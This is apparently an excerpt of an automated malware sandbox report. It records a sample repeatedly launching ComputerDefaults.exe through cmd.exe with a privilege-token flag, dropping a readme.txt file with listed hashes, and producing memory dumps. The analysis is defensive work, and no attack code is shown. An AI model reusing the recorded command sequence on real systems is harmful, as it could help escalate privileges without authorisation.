- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:3248

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:3108
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:3556

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:4820
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:1808

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:2152
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:4944

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:3668
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:392

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:3776
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:520

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:4244
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:5100

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:4208
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:1148

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:4428
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:3968

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:2616
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:4156

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Public\readme.txt

MD5
efee255343869933b9d9c75c8c008d24

SHA1
74439a873a5882ae9e1e3932accde6106a49d6c9

SHA256
ace850e1350ec1e00b97bb7047a7b88b919caa9952c8cab4615a77730cb5ef55

SHA512
fda74d236f13faadc9f7a81bcf355917c108919c3c3b2a71cd61747764ac22acf001c2300f4bd6b0fe05748bde39309702bcece05cfd4d9cd7bda3b14f5280fc

Download Submit
memory/392-173-0x0000000000000000-mapping.dmp

Download
memory/520-175-0x0000000000000000-mapping.dmp

Download
memory/520-136-0x0000000000000000-mapping.dmp

Download
memory/596-137-0x0000000000000000-mapping.dmp

Download
memory/608-156-0x0000000000000000-mapping.dmp

Download
memory/648-138-0x0000000000000000-mapping.dmp

Download
memory/672-160-0x0000000000000000-mapping.dmp

Download
memory/1044-139-0x0000000000000000-mapping.dmp

Download
memory/1148-174-0x0000000000000000-mapping.dmp

Download
memory/1212-155-0x0000000000000000-mapping.dmp

Download
memory/1328-140-0x0000000000000000-mapping.dmp

Download
memory/1344-161-0x0000000000000000-mapping.dmp

Download
memory/1448-164-0x0000000000000000-mapping.dmp

Download
memory/1552-141-0x0000000000000000-mapping.dmp

Download
memory/1668-165-0x0000000000000000-mapping.dmp

Download
memory/1808-169-0x0000000000000000-mapping.dmp

Download
memory/2096-145-0x0000000000000000-mapping.dmp

Download
memory/2204-166-0x0000000000000000-mapping.dmp

Download
memory/2276-148-0x0000000000000000-mapping.dmp

Download
memory/2396-142-0x0000000000000000-mapping.dmp

Download
memory/2408-130-0x0000016FD2CA0000-0x0000016FD2CA4000-memory.dmp

Filesize
16KB

Download
memory/2612-143-0x0000000000000000-mapping.dmp

Download
memory/2632-144-0x0000000000000000-mapping.dmp

Download
memory/2828-153-0x0000000000000000-mapping.dmp

Download
memory/2840-158-0x0000000000000000-mapping.dmp

Download
memory/3128-133-0x0000000000000000-mapping.dmp

Download
memory/3180-159-0x0000000000000000-mapping.dmp

Download
memory/3248-167-0x0000000000000000-mapping.dmp

Download
memory/3556-168-0x0000000000000000-mapping.dmp

Download
memory/3696-134-0x0000000000000000-mapping.dmp

Download
memory/3968-172-0x0000000000000000-mapping.dmp

Download
memory/3984-128-0x000002682F270000-0x000002682F271000-memory.dmp

Filesize
4KB

Download
memory/3984-124-0x000002682F210000-0x000002682F211000-memory.dmp

Filesize
4KB

Download
memory/3984-119-0x000002682D200000-0x000002682D201000-memory.dmp

Filesize
4KB

Download
memory/3984-120-0x000002682D210000-0x000002682D211000-memory.dmp

Filesize
4KB

Download
memory/3984-121-0x000002682D220000-0x000002682D221000-memory.dmp

Filesize
4KB

Download
memory/3984-122-0x000002682D230000-0x000002682D231000-memory.dmp

Filesize
4KB

Download
memory/3984-127-0x000002682F260000-0x000002682F261000-memory.dmp

Filesize
4KB

Download
memory/3984-157-0x000002682F880000-0x000002682F881000-memory.dmp

Filesize
4KB

Download
memory/3984-129-0x000002682F280000-0x000002682F281000-memory.dmp

Filesize
4KB

Download
memory/3984-118-0x000002682D180000-0x000002682D186000-memory.dmp

Filesize
24KB

Download
memory/3984-123-0x000002682F200000-0x000002682F201000-memory.dmp

Filesize
4KB

Download
memory/3984-125-0x000002682F220000-0x000002682F221000-memory.dmp

Filesize
4KB

Download
memory/3984-126-0x000002682F250000-0x000002682F251000-memory.dmp

Filesize
4KB

Download
memory/4056-135-0x0000000000000000-mapping.dmp

Download
memory/4124-163-0x0000000000000000-mapping.dmp

Download
memory/4128-154-0x0000000000000000-mapping.dmp

Download
memory/4156-176-0x0000000000000000-mapping.dmp

Download
memory/4300-152-0x0000000000000000-mapping.dmp

Download
memory/4320-151-0x0000000000000000-mapping.dmp

Download
memory/4492-131-0x0000000000000000-mapping.dmp

Download
memory/4600-146-0x0000000000000000-mapping.dmp

Download
memory/4672-162-0x0000000000000000-mapping.dmp

Download
memory/4876-147-0x0000000000000000-mapping.dmp

Download
memory/4908-150-0x0000000000000000-mapping.dmp

Download
memory/4916-149-0x0000000000000000-mapping.dmp

Download
memory/4944-170-0x0000000000000000-mapping.dmp

Download
memory/5100-171-0x0000000000000000-mapping.dmp

Download